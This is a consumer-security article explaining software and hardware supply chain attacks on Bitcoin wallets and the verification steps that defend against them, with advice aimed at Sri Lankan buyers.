Supply Chain Attacks in Crypto

Supply chain attacks target the tools, software, and hardware you use to interact with Bitcoin — rather than attacking Bitcoin itself. These are among the most insidious threats because they compromise systems you trust, making them extremely difficult to detect.

Software Supply Chain Attacks

Bitcoin wallets, node software, and related tools are built using thousands of software dependencies. An attacker who compromises any single dependency in the chain can potentially steal funds from millions of users:

• Compromised npm/PyPI packages: In 2022 and 2023, multiple malicious packages were published to npm and PyPI that specifically targeted cryptocurrency wallets. These packages contained code that would scan for wallet files, seed phrases, and private keys, then exfiltrate them to the attacker.
• Malicious browser extensions: Fake wallet extensions (posing as MetaMask, Phantom, or other popular wallets) are regularly uploaded to browser extension stores. They function normally but silently steal private keys.
• Compromised wallet software: Attackers have targeted the build systems of wallet projects, injecting malicious code that modifies the generated receiving addresses — so when you think you are receiving Bitcoin, it goes to the attacker's address.
• Update mechanism hijacking: Auto-update features in wallet software can be compromised, pushing malicious updates to legitimate users.

Hardware Supply Chain Attacks

Physical devices can be compromised before they reach you:

• Modified hardware wallets: Fake or tampered Ledger, Trezor, and other hardware wallets are sold on unofficial marketplaces. These devices may have pre-set seed phrases (known to the attacker) or modified firmware that leaks private keys.
• Evil maid attacks: An attacker with physical access to your hardware wallet or computer installs a keylogger, modified firmware, or surveillance device while you are away.
• Compromised manufacturing: In theory, an attacker could compromise the manufacturing process of hardware wallets to insert backdoors. This is why open-source hardware designs (like SeedSigner) are gaining popularity.

Verification Is Your Shield

The core defense against supply chain attacks is verification at every step:

• Verify software signatures: Bitcoin Core, Sparrow Wallet, and other reputable software publish GPG signatures. Always verify the download signature before installing — this confirms the software has not been tampered with.
• Buy hardware wallets only from official sources: Never buy from Amazon third-party sellers, eBay, or local resellers. Only purchase directly from the manufacturer (Ledger, Trezor, ColdCard) or authorized retailers.
• Check tamper-evident packaging: Hardware wallets ship with security seals and holographic stickers. Inspect these carefully before use.
• Generate your own seed: If a hardware wallet arrives with a pre-filled seed phrase card, it has been compromised. Always generate a new seed phrase on the device itself.
• Use reproducible builds: Some wallet software (like Sparrow) supports reproducible builds — you can verify that the distributed binary matches the published source code exactly.

Sri Lanka Context

In Sri Lanka, where hardware wallets are not widely available in retail stores, many users order from international sellers or buy second-hand. This creates significant supply chain risk. Always order directly from manufacturers like Ledger (ledger.com) or Trezor (trezor.io) — even if shipping takes longer and costs more. The price of a compromised hardware wallet is not the LKR 25,000 you paid for it — it is every satoshi you store on it. Some Sri Lankan Bitcoin community groups maintain lists of verified purchase channels, which can be a useful resource for new users.